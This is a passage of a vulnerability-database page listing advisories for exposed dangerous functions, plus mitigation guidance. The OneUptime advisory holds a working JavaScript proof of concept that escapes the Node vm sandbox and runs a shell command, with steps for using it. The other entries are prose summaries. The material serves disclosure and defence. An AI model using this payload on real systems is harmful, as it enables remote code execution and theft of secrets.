https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L66-L84\n\nThe probe worker polls queued monitor tests and executes them:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85\n\nFor `MonitorType.SyntheticMonitor`, the user-controlled `customCode` is passed into `SyntheticMonitor.execute(...)`:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/Monitor.ts#L323-L338\n\n`SyntheticMonitor.execute(...)` then runs that code through `VMRunner.runCodeInNodeVM(...)` and injects the live Playwright `browser` and `page` objects into the VM context:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168\n\n`VMRunner.runCodeInNodeVM(...)` creates a Node `vm` context and exposes host objects into it, including the additional context objects:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Server/Utils/VM/VMRunner.ts#L323-L405\n\nThe proxy wrapper blocks only a small set of property names and still forwards normal method calls with the real host `this` binding. Because of that, untrusted monitor code can still use legitimate Playwright methods on the injected `browser` object.\n\nThat is enough for code execution because Playwright\u0027s `Browser` exposes `browserType()`, and `BrowserType.launch()` accepts attacker-controlled process launch options such as `executablePath`, `args`, and `ignoreDefaultArgs`. An attacker can therefore cause the probe to spawn an arbitrary executable. Even if Playwright later errors because the spawned process is not a real browser, the command has already executed.\n\nThis same execution path is also used for normal scheduled monitors, not only one-shot monitor tests:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchList.ts#L110-L121\n\nAs a result, the issue can be abused either as a one-shot RCE via `Test Monitor` or as a persistent scheduled RCE by saving a malicious Synthetic Monitor.\n\n### PoC\n\n1. Log in as any user with normal project membership.\n2. Go to `Monitors -\u003e Create New Monitor`.\n3. Select `Synthetic Monitor`.\n4. In `Playwright Code`, paste the following script:\n\n```javascript\n const HostFunction =\n    Object.getOwnPropertyDescriptor(console, \"log\").value.constructor;\n\n  return {\n    data: {\n      node: HostFunction(\u0027return process.version\u0027)(),\n      cwd: HostFunction(\u0027return process.cwd()\u0027)(),\n      id: HostFunction(\n        \u0027return process.getBuiltinModule(\"child_process\").execSync(\"id\").toString()\u0027\n      )(),\n    },\n  };\n\n```\n\n5. Select any one browser type, for example `Chromium`.\n6. Select any one screen type, for example `Desktop`.\n7. Set retry count to `0`.\n8. Click `Test Monitor` and choose a probe.\n\nExpected result:\n\n- the monitor execution succeeded and in the `Show More Details` the command output is shown.\n\u003cimg width=\"899\" height=\"249\" alt=\"image\" src=\"https://github.com/user-attachments/assets/98ebd26f-431b-438e-9459-7deeebf97b18\" /\u003e\n\n\n\n### Impact\n\nThis is a server-side `Remote Code Execution` issue affecting the probe component.\n\nWho is impacted:\n\n- any OneUptime deployment where an attacker can obtain ordinary project membership\n- environments where the probe has access to internal services, secrets, Kubernetes metadata, database credentials, proxy credentials, or other cluster-local trust relationships",
  "id": "GHSA-4j36-39gm-8vq8",
  "modified": "2026-03-10T18:44:23Z",
  "published": "2026-03-07T02:39:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-4j36-39gm-8vq8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30921"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L861-L918"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L66-L84"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/Monitor.ts#L45-L78"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/MonitorTest.ts#L27-L60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Server/Utils/VM/VMRunner.ts#L323-L405"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchList.ts#L110-L121"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/Monitor.ts#L323-L338"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OneUptime: Synthetic Monitor RCE via exposed Playwright browser object"
}

GHSA-4J75-478W-F7PX

Vulnerability from github – Published: 2025-12-24 00:30 – Updated: 2025-12-24 00:30
VLAI
Details

RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27675.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14493"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-23T22:15:50Z",
    "severity": "HIGH"
  },
  "details": "RealDefense SUPERAntiSpyware Exposed Dangerous Function Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of RealDefense SUPERAntiSpyware. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the SAS Core Service. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27675.",
  "id": "GHSA-4j75-478w-f7px",
  "modified": "2025-12-24T00:30:15Z",
  "published": "2025-12-24T00:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14493"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1170"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4JPF-8W9V-465F

Vulnerability from github – Published: 2024-11-22 21:32 – Updated: 2024-11-22 21:32
VLAI
Details

PaperCut NG print.script.sandboxed Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PaperCut NG. Authentication is required to exploit this vulnerability.

The specific flaw exists within the management of the print.script.sandboxed setting. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20965.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-39470"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-22T20:15:05Z",
    "severity": "HIGH"
  },
  "details": "PaperCut NG print.script.sandboxed Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PaperCut NG. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the management of the print.script.sandboxed setting. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20965.",
  "id": "GHSA-4jpf-8w9v-465f",
  "modified": "2024-11-22T21:32:15Z",
  "published": "2024-11-22T21:32:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39470"
    },
    {
      "type": "WEB",
      "url": "https://www.papercut.com/kb/Main/SecurityBulletinJune2023"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-24-786"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.

Mitigation
Architecture and Design Implementation

Strategy: Attack Surface Reduction

  • Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
  • Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
  • accessible to all users
  • restricted to a small set of privileged users
  • prevented from being directly accessible at all
CAPEC-500: WebView Injection

An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.